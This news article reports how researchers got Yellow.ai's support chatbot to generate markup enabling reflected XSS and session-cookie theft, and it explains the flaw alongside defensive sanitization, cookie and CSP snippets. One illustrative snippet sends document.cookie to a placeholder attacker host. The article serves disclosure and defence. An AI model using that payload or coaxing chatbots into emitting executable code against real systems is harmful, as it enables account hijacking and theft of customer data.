Yellow.ai’s Own AI Chatbot Got Tricked Into Generating Malicious Code

The vulnerability could have enabled Cross-Site Scripting (XSS) attacks, endangering employee and customer data


Published: September 17, 2025

Nicole Willing

Yellow.ai has become the latest firm flagged for a security flaw in its online chatbot, a vulnerability hackers could have used to hijack accounts.

While that may not seem headline-worthy given the recent spate of conversational AI attacks, this one has a twist: Yellow.ai is itself a chatbot provider.

Last month, it even featured as a Challenger in Gartner’s Conversational AI Magic Quadrant.

Nevertheless, researchers at Cybernews found a flaw that allowed them to trick the company’s chatbot into generating malicious HTML or JavaScript (JS) code that could enable cross-site scripting (XSS) attacks. They reported:

The reflected XSS vulnerability allows the attacker to steal session cookies for the support agent’s account, in turn hijacking their account, which can lead to further data exfiltration from the customer support platform.
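Cybernews has not published the exact payload, but the attack shape it describes is well established. Purely as an illustration, a cookie-stealing script smuggled in through reflected XSS often looks something like the sketch below (the exfiltration domain is a placeholder, not anything from the report):

```ts
// Illustrative only: the classic shape of a cookie-stealing XSS payload.
// If chatbot output containing markup that runs script like this is
// rendered unsanitized in the support agent's browser, it executes with
// the agent's session. "attacker.example" is a placeholder domain.
new Image().src =
  "https://attacker.example/collect?c=" + encodeURIComponent(document.cookie);
```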

Indeed, the flaw left cookies created by Yellow.ai’s own customer service chatbot open to theft. The researchers said it is unclear whether clients using the bot in their CX implementations were exposed to the same vulnerability.

The likes of Sony, Hyundai, Domino’s, and Logitech use the Yellow.ai platform in their customer support operations.

While Yellow.ai did not acknowledge Cybernews’ disclosure of the security flaw, the company did fix it, sanitizing the generated code so that it would not be executed.
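Neither party has detailed the fix, but “sanitizing the generated code” typically means escaping HTML metacharacters in the model’s output before the browser sees it. A minimal sketch, with an illustrative function name:

```ts
// Minimal sketch of output sanitization: escape HTML metacharacters in
// chatbot-generated text before rendering, so any <script> tag or event
// handler is displayed as inert text instead of executed.
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;") // escape & first so later entities stay intact
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// e.g. "<script>alert(1)</script>" becomes
//      "&lt;script&gt;alert(1)&lt;/script&gt;"
```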

Cybernews’ researchers recently found a similar flaw in Lenovo’s customer service assistant, Lena, which was built on Microsoft Copilot Studio. That flaw allowed them to steal live session cookies from customer support agents and gain access to sensitive company information.

AI Chatbots Are Exposing Enterprises to Security Vulnerabilities

The incidents highlight the growing security risk to enterprises incorporating AI chatbots and agents into their customer service operations.

In recent days, the US Federal Bureau of Investigation (FBI) warned that cybercriminal groups have been targeting organizations’ Salesforce platforms by exploiting API integrations with a third-party AI chatbot and conducting phishing attacks on CRM users, such as customer support reps.

And the “sycophantic helpfulness” that Cybernews’ researchers note is ingrained in many of the large language models (LLMs) on which such AI tools run can make them vulnerable to misuse. Indeed, attackers can use simple prompts to get unprotected chatbots to inadvertently teach them how to produce malicious HTML and JavaScript code.
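The execution step typically happens in the chat widget itself: if the front end renders model output as HTML rather than plain text, whatever markup an attacker has coaxed out of the LLM runs in the viewer’s browser. A hedged sketch of the vulnerable pattern and its safer counterpart (the element ID and helper function are hypothetical):

```ts
// Untrusted model output; getChatbotReply is a hypothetical helper.
declare function getChatbotReply(): string;
const reply = getChatbotReply();

// Vulnerable: the reply is parsed as HTML, so injected markup
// (e.g. an onerror event handler) can execute in the agent's browser.
document.getElementById("chat-log")!.innerHTML = reply;

// Safer: the reply is treated as plain text; markup is shown, not run.
document.getElementById("chat-log")!.textContent = reply;
```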

Executing JavaScript code, in particular, can have serious implications for security. Attackers can use JS to manipulate the behavior of web applications or even gain access to backend systems through further exploits.
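Session-cookie theft in particular can be blunted server-side. Marking the cookie HttpOnly keeps it out of reach of document.cookie, so even a script that does execute cannot read it directly. A minimal Node.js sketch, with an illustrative cookie name and value:

```ts
// Sketch of one standard mitigation for the session-hijacking risk
// described above: an HttpOnly cookie is invisible to page JavaScript.
import { createServer } from "node:http";

createServer((req, res) => {
  res.setHeader(
    "Set-Cookie",
    "session=opaque-token; HttpOnly; Secure; SameSite=Strict; Path=/"
  );
  res.end("ok");
}).listen(8080);
```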

The risk of account hijacking demonstrates why enterprises must be wary of the hype-driven push to implement LLM-based tools quickly without ensuring they have adequate security systems in place. According to Cybernews’ researchers:

The flaw highlights multiple security issues, such as improper user input sanitization, improper chatbot output sanitization, the web server not verifying content produced by the chatbot, running unverified code, and loading content from arbitrary web resources… For example, attackers could bypass sanitization to inject unauthorized code into the system.
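The last two issues on that list, running unverified code and loading content from arbitrary web resources, are exactly what a Content-Security-Policy header is designed to contain. A hedged sketch with illustrative directive values:

```ts
import { createServer } from "node:http";

// A restrictive CSP blocks inline scripts and loads from arbitrary
// origins even when malicious markup slips past sanitization.
// The directive values below are illustrative, not Yellow.ai's config.
createServer((req, res) => {
  res.setHeader(
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'"
  );
  res.end("agent console");
}).listen(8081);
```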

AI chatbot scams are one of 2025’s most significant digital threats, according to cybersecurity firm Quick Heal Technologies. Security labs are detecting thousands of new AI-built fraud tools every month.

In addition to generating malicious code, criminals exploit pre-trained LLMs to deploy automated fraudulent attacks that can target thousands of victims simultaneously. As AI becomes more sophisticated, hackers are imitating trusted brands such as banks, delivery services, and government agencies with increasing accuracy.

 
